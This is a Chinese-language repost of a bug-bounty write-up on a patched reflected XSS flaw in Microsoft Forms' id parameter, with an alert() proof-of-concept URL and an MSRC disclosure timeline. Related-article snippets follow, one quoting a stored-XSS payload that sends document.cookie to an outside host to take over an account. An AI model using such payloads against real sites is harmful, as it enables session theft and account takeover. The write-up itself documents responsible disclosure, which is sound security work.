实战 | 记一次微软的3000美金赏金的反射型XSS漏洞挖掘

VSole2023-02-20 11:43:50

在这篇文章中,我将讨论 Microsoft Forms 中反射式跨站点脚本 (XSS) 漏洞的详细信息。

背景:

Microsoft Forms 是一种流行的基于 Web 的工具,用于创建调查、测验和其他表单。它允许用户创建表单和调查,与他人共享,并在集中位置收集响应。但是,我们发现可以将恶意JavaScript代码注入表单中,这些代码可以由毫无戒心的用户执行。

我遵循了 MSRC 报告漏洞的准则并提交了我的发现。欲了解更多信息,请参阅:

向 MSRC 提交报告的示例 https://www.microsoft.com/en-us/msrc/bounty-example-report-submission微软赏金计划 |微软公司 https://www.microsoft.com/en-us/msrc/bounty?rtc=1常见问题解答 — 报告问题和提交指南 (microsoft.com) https://www.microsoft.com/en-us/msrc/faqs-report-an-issue?rtc=1

漏洞的详细信息:

该漏洞存在于Microsoft Forms处理用户输入的方式中。具体而言,它无法正确验证用户输入,从而允许攻击者将恶意 JavaScript 代码注入 id 参数。攻击者可以使用注入的 XSS 有效负载生成恶意链接,他们可以利用此漏洞接管经过身份验证的帐户或对应用程序中经过身份验证的用户会话执行状态更改操作,甚至使用易受攻击的域制作网络钓鱼页面等。

易受攻击的产品:Microsoft Forms

易受攻击的网址:https://forms.office.com/pages/responsepage.aspx

易受攻击的参数:id

反射型 XSS(跨站点脚本)是一种 Web 漏洞,允许攻击者将恶意代码注入网站,然后由受害者的浏览器执行。当网站在其页面中包含不受信任的用户输入而没有进行适当的验证或编码时,就会发生这种情况。攻击者制作一个特殊的链接或表单,当受害者点击或提交时,会导致受害者的浏览器执行恶意代码。受害者的浏览器被诱骗认为代码是网站的一部分,允许攻击者窃取敏感信息或执行其他恶意操作

开发:

要利用此漏洞,攻击者需要创建包含恶意 JavaScript 代码的特制链接。然后,攻击者需要诱使用户单击链接,这将导致代码被执行。这可以通过社会工程策略来完成,例如网络钓鱼电子邮件或即时消息。

漏洞验证:

下面是演示漏洞的概念证明示例:

  1. 1. 访问网址:
https://forms.office.com/Pages/ResponsePage.aspx
  1. 2. 将 XSS payload注入参数值,并添加到步骤 1 中易受攻击的 URL,id

payload已使用:

d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g

示例注入链接:

https://forms.office.com/pages/responsepage.aspx?id=d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
  1. 3. 在步骤 2 中打开 URL。
  2. 4. 当用户打开 XSS 注入链接时,XSS 有效负载将被触发并执行,如下所示。
  3. 视频演示:https://youtu.be/pjbaZYEYQV8

披露时间表

2022 年9月27日 — 通过 MSRC 门户发现并报告漏洞。

2022年9月29日 — MSRC 团队确认。MSRC 票证已移至审阅/重现。

2022年10月4日 — 授予赏金,MSRC 案例状态从“审阅/重现”更改为“开发”

2022年10月21日 — MSRC 状态已更改为“预发布和完成”。

2023年1月22日 — 公开发布安全公告。

漏洞挖掘xss
本作品采用《CC 协议》,转载必须注明作者和本文链接
跨站脚本英文全称(Cross Site Scripting跨站脚本),为了不和css层叠样式表(英文全称:Cascading Style Sheets)混淆,因此将跨站脚本缩写为XSS。本期我们讲解一下XSS漏洞原理和利用检测。
ezXSS介绍ezXSS是一款用于渗透测试和漏洞挖掘XSS盲测跨站脚本工具。在演示版本中可能禁用了一些特性。
但当存在存储型XSS时,受害者打开此URL,攻击代码将会被触发,这种情况下便称之为存储型XSS漏洞。在标题处和帖子内容中分别填写payload,填写好之后,应与下图一致填写好内容之后,点击下方的发表按钮,即可进行发帖,发帖成功会弹出一个提示成功,如下图所示?????
xsshelp闲着没事随便写的一个辅助挖掘xss漏洞的工具xsshelp version: 1.0.0Usage: [-ut] [-u url] [-t thread] [-h help]Options: -h this help -t intthread Num -u string a target url
我发现了一个存储的XSS漏洞,我可以通过窃取cookie升级为帐户接管。我的payload目前需要最少的用户交互,只需单击即可。之后,向下滚动并单击取消预约。确保您拦截了此请求。使用以下有效载荷添加消息:"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">您通常会收到一个确认框,确认您的预约已取消,单击确定。即使管理员注销,此cookie也可以轻松重用。这是因为cookie不会过期。影响我能够通过取消我们的预约并包含一条消息来接管一个管理员帐户。这意味着我们必须找到一个具有用户交互的。
在查看电子邮件时,我发现了 Microsoft 的新服务预订。Microsoft booking 允许任何人预订服务/日历时段。此应用程序有两个界面,一个是内部界面,另一个是面向公众的服务页面。我决定深入检查这个应用程序。我尝试插入各种 XSS payload 来触发 xss 但没有成功。现在我的注意力转移到了这个标签上。应用程序有各种保护机制来防止脚本的执行。
在这篇文章中,我将讨论 Microsoft Forms 中反射式跨站点脚本 漏洞的详细信息。它允许用户创建表单和调查,与他人共享,并在集中位置收集响应。但是,我们发现可以将恶意JavaScript代码注入表单中,这些代码可以由毫无戒心的用户执行。我遵循了 MSRC 报告漏洞的准则并提交了我的发现。欲了解更多信息,请参阅:向 MSRC 提交报告的示例 https://www.microsoft.com/en-us/msrc/bounty-example-report-submission微软赏金计划 |微软公司 https://www.microsoft.com/en-us/msrc/bounty?
每个黑客都会遇到这个,第一个赏金。我实际上无法解释它的感觉,但我知道你们中的大多数人都能理解它的感觉。当我们开始在 Web 应用程序安全中进行漏洞赏金时,我们大多数人都会从 XSS开始,故事从这里开始。
记一次NFT平台的存储型XSS和IDOR漏洞这是我在 NFT 市场中发现的一个令人兴奋的安全问题,它允许我通过链接 IDOR 和 XSS 来接管任何人的帐户,以实现完整的帐户接管漏洞。我们能够用我们自己的价值观修改受害者用户的个人资料。现在我们可以提出任何其他请求来执行其他经过身份验证的操作,例如出售艺术品或转让或删除用户的艺术品漏洞披露
大家好,在本文中,我将分享我在2个TikTok资产发现的XSS漏洞。当我决定在TikTok 程序中寻找漏洞 时,我花了1个月的时间寻找这个XSS。当我在TikTok 卖家账户上创建产品时,这个 XSS 发现开始了我在卖家账户的产品名称中插入了 XSS payload。
VSole
网络安全专家